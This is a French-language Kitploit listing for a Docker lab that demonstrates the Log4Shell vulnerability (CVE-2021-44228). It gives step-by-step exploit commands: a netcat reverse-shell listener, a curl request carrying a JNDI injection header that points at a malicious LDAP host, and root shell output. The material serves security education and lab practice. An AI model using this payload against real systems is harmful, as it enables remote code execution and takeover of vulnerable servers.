Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
mi-laboratorio-log4shell — Laboratoire automatisé Plug & Play dans Docker pour auditer et étudier la vulnérabilité Log4Shell (CVE-2021-44228) | Kitploit
Outils/GitHubGitHub/mafo-sec/mi-laboratorio-log4shell
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubmafo-sec/mi-laboratorio-log4shell

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

mi-laboratorio-log4shell

Laboratoire automatisé Plug & Play dans Docker pour auditer et étudier la vulnérabilité Log4Shell (CVE-2021-44228)

Voir le dépôt
il y a 3 moisPas encore vérifié

🚀 Laboratoire Automatisé Log4Shell (CVE-2021-44228) Prêt à l'Emploi

Un laboratoire de recherche en sécurité automatisé, en une seule commande, conçu pour démontrer et auditer la vulnérabilité d'exécution de code à distance (RCE) Log4Shell (CVE-2021-44228).

Ce projet consolide tous les composants nécessaires (application vulnérable, serveur LDAP malveillant et outils d'attaque) dans une infrastructure réseau unifiée et isolée utilisant Docker Compose.


⚙️ Fonctionnalités Clés

  • 100% Prêt à l'Emploi : Aucune configuration manuelle d'adresse IP, édition de fichier .env ou alignement réseau requis. Tout se résout automatiquement via le DNS interne de Docker.
  • Compatibilité Bytecode : Le code d'exploitation est automatiquement cross-compilé pour forcer la compatibilité avec l'architecture plus ancienne de la machine virtuelle Java (JVM) de la victime, éliminant les problèmes d'UnsupportedClassVersionError.
  • Déploiement Centralisé : Contrôlé entièrement par une couche d'orchestration unique et un gestionnaire de script Bash interactif (configurar.sh) qui automatise le démantèlement des conteneurs, le nettoyage du cache et les reconstructions.

🏗️ Aperçu de l'Architecture

Le laboratoire crée un réseau pont isolé (red-log4shell) avec trois acteurs clés :

  1. Victime (web-vulnerable): Une application web Spring Boot utilisant une version non atténuée et vulnérable de Log4j (2.14.1) fonctionnant sur Java 8u111.
  2. Serveur LDAP (ldap-malicioso): Alimenté par marshalsec pour intercepter les requêtes de recherche entrantes et rediriger dynamiquement la victime vers la charge utile de l'attaquant.
  3. Attaquant (kali-tools): Un conteneur Kali Linux personnalisé hébergeant un serveur HTTP Python pour délivrer la charge utile d'exploitation compilée (Exploit.class) et un écouteur Netcat pour capturer le reverse shell.

⚙️ Démarrage Rapide

Pour déployer ce laboratoire sur toute machine Linux avec Docker installé, exécutez les commandes suivantes dans votre terminal :

root@kitploit:~
# 1. Clonez le dépôt
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git

# 2. Naviguez vers le répertoire du projet
cd mi-laboratorio-log4shell

# 3. Accordez les permissions d'exécution au gestionnaire de script et lancez le labo
chmod +x configurar.sh
./configurar.sh

🚀 Comment Exploiter (Étape par Étape)

Une fois l'infrastructure automatiquement opérationnelle via le script, suivez ces étapes pour déclencher l'exploit et capturer le reverse shell.

Étape 1 : Configurer l'Écouteur Netcat

Ouvrez un nouveau terminal sur votre machine hôte (Ubuntu) et attachez-vous au conteneur de l'attaquant pour mettre Netcat en attente des connexions entrantes :

root@kitploit:~
sudo docker exec -it kali-tools bash

À l'intérieur du conteneur Kali, démarrez l'écouteur :

root@kitploit:~
nc -lvnp 4444

Vous verrez le message : listening on [any] 4444 ...

Étape 2 : Lancer le Vecteur d'Attaque

Ouvrez un autre terminal séparé sur votre machine hôte et envoyez la chaîne d'injection JNDI malveillante intégrée dans l'en-tête X-Api-Version :

root@kitploit:~
curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'

Étape 3 : Vérifier le Reverse Shell

Retournez à votre terminal Netcat. Vous devriez voir une connexion active. Vous pouvez maintenant exécuter des commandes en tant que root à l'intérieur du serveur victime :

root@kitploit:~
connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164
whoami
root

⚠️ Avertissement

Ce dépôt est créé strictement à des fins éducatives, de recherche en sécurité et d'audit académique autorisé. N'exécutez jamais ces outils ou n'attaquez une infrastructure sans autorisation écrite préalable explicite des propriétaires de l'infrastructure.

Télécharger l’outil